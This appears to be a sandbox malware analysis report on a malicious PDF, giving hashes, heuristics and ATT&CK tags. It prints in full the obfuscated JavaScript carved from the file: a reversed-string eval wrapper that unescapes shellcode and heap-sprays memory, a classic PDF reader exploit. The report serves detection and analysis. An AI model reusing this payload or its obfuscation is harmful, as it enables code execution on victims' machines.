Malicious PDF — malware analysis report

Static analysis result for SHA-256 f790385ad59c783c…

MALICIOUS

PDF

68.1 KB First seen: 2013-03-04
MD5: 2c39b29e91e7742620e52f0779ae46df SHA-1: 0d7610bd02beb1eccb372007ea73ecb4a98b9fb5 SHA-256: f790385ad59c783cfc9793b42b66271e54a8444c60dfd3df76a90937d28720c9
68 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1566.001 Spearphishing Attachment T1204.002 Malicious File

The PDF document contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The ML classifier strongly flags this PDF as malicious. The embedded JavaScript file, 'javascript_obj0012_000.js', is likely responsible for executing the malicious payload. The presence of an embedded URL to 'http://www.bitstream.com' suggests a potential download or redirection vector.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9996

Heuristics 4

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bitstream.com In PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0x104F0 2608 bytes
SHA-256: bb91fd30e1aaf48b0894565aa402ae6635580470fa25e980d566994a4d0072ae
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var eva=new Function("a","ev     al        (a);".split(" ").join(""));
       var s=' ;"s"+3_ozotlav=]i_ozotlav[4_ozotlav )++i_ozotlav;0f1x0<i_ozotlav;0=i_ozotlav( rof ;)(yarrA wen = 4_ozotlav rav ;)2 / )80x0-0201x0( - 00008x0 ,0(gnirtsbus.d_ozotlav = 3_ozotlav ;d_ozotlav =+ d_ozotlav )00008x0 < htgnel.d_ozotlav(elihw ;)2/63556 ,0(gnirtsbus.b_ozotlav = d_ozotlav ;c_ozotlav =+ b_ozotlav ;olygak =+ b_ozotlav ;)2/)42x0-c0c0x0( ,0(gnirtsbus.c_ozotlav = b_ozotlav ;c_ozotlav=+c_ozotlav )63556 < 8 + 02 + htgnel.c_ozotlav( elihw ;) "c" + "0" + "c" + "0" + "u" + "%" + "c" + "0" + "c" + "0" + "u" + "%" (epak = c_ozotlav rav ;) )""(nioj.)" "(tilps."3e14u%b182u%a9fcu%b9a8u%2382u%806cu%055au%7e3cu%e26fu%6762u%2ba7u%a206u%7bf7u%dc87u%23ffu%3bafu%4cbbu%da8fu%c06eu%42d1u%d0e4u%ac65u%6c9eu%d864u%d466u%4e77u%244cu%2e76u%7397u%315eu%4531u%7c35u%e11fu%615fu%df51u%0b9cu%4afau%3e0au%062eu%7928u%fa36u%a136u%4975u%b9fau%bc33u%e2bdu%83f3u%afd3u%bdebu%9658u%6c41u%daf0u%df56u%014fu%5861u%fe18u%1409u%2e87u%e7f1u%a939u%d7c2u%b495u%58dau%e3a6u%9b2eu%9e96u%813du%14d2u%e4b2u%9e11u%c4bfu%c1b9u%92b3u%c13eu%5ec2u%f91cu%0486u%d2c2u%793eu%2cc7u%e4dfu%f8d7u%e623u%a5d9u%2982u%89bfu%a026u%7053u%c2b4u%eaf7u%3e42u%4190u%dac8u%4916u%5a8du%5adau%1bb8u%49f7u%73e6u%34c1u%4be8u%2505u%38c6u%3551u%5130u%1335u%4fb5u%4742u%339du%141bu%ea2bu%ab78u%ad3cu%139cu%0070u%f211u%0070u%137du%0070u%d451u%ff09u%ffffu%0070u%bb51u%0070u%227au%0070u%d451u%0909u%0909u%0070u%bb51u%0070u%227au%0070u%d451u%0909u%0909u%0070u%bb51u%0070u%227au%0070u%d451u%0909u%ff09u%0070u%bb51u%0070u%227au%0070u%d451u%ffffu%8e6eu%0070u%bb51u%0070u%227au%0070u%d451u%be50u%57eeu%0070u%bb51u%0070u%227au%0070u%d451u%c0c0u%c0c0u%0070u%bb51u%0070u%227au%0070u%d451u%18bfu%2c40u%0070u%bb51u%0070u%227au%0070u%d451u%4038u%380cu%0070u%bb51u%0070u%227au%0070u%d451u%9881u%b8a1u%0070u%bb51u%0070u%227au%0070u%d451u%5185u%a5beu%0070u%bb51u%0070u%227au%0070u%d451u%4509u%a509u%0070u%bb51u%0070u%137du%0000u%0400u%0000u%0001u%1000u%4010u%0000u%0000u%1000u%0010u%ffffu%ffffu%0070u%45c5u%0070u%2e25u%1000u%1100u%0070u%7f27u%0070u%ca8au%1000u%0010u%0070u%bb51u%0070u%ca8au%1000u%1100u%0070u%bb51u%0070u%2bf7u%eff7u%0030u%0070u%bb51u%0070u%d451u%0000u%0001u%0070u%bb51u%1000u%4010u%0070u%7f27u%1000u%4210u%0070u%9951u%0070u%4809u%0070u%4809u%0070u%4809u%0070u%4809u%0070u%4809u%0070u%4809u%0070u%4809u%0070u%4809u%c0c0u%c0c0u%0070u%4809u%0070u%3309u%0070u%4809u%0070u%4809u%0070u%4809u%0070u%4809u%0070u%4809u%0070u%4809u%ccccu%ccccu%0070u%f651u%0070u%fe84u%ccccu%ccccu%0070u%9194u%c0c0u%c0c0u%" (epak = olygak rav ;epacsenu = epak rav ';
eva(s.split("").reverse().join(""));
font_00_sfnt_off00000319.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x319 65932 bytes
SHA-256: 67cf5b115c479e7cc69ef02607414d718125a1e117a59d537db3e97682d5b723
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)

Open this report in the interactive analyzer, or submit your own file for analysis.